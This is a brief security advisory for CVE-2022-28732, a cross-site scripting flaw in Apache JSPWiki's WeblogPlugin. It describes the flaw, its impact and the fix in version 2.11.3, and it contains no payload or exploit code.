Apache JSPWiki Cross-site scripting vulnerability on WeblogPlugin

Description

CVE-2022-28732 is a cross-site scripting (XSS) vulnerability found in the WeblogPlugin component of Apache JSPWiki. The issue arises when a carefully crafted request is processed by the plugin, which fails to properly sanitize user-supplied input before reflecting it in the page. This allows an attacker to inject arbitrary JavaScript or HTML into the wiki interface [1][3].

Exploitation

An attacker can exploit this vulnerability by sending a malicious request to a JSPWiki instance running version 2.11.2 or earlier. No authentication is explicitly required beyond typical web access to the wiki, as the crafted request can be delivered via a link or embedded in a page that a victim views. The attacker must craft the request to be processed by WeblogPlugin, which then renders the malicious payload in a way that executes in the context of the victim's browser session [2][3].

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the victim's browser. This can lead to information disclosure, such as reading cookies, session tokens, or other sensitive data available to the wiki application. The attacker could also perform actions on behalf of the victim, potentially escalating privileges or modifying wiki content [1][3].

Mitigation

The vulnerability is fixed in Apache JSPWiki version 2.11.3 and later. Users are strongly advised to upgrade immediately. There is no mention of a workaround for older versions. The issue was reported by Wang Ran from JDArmy [3].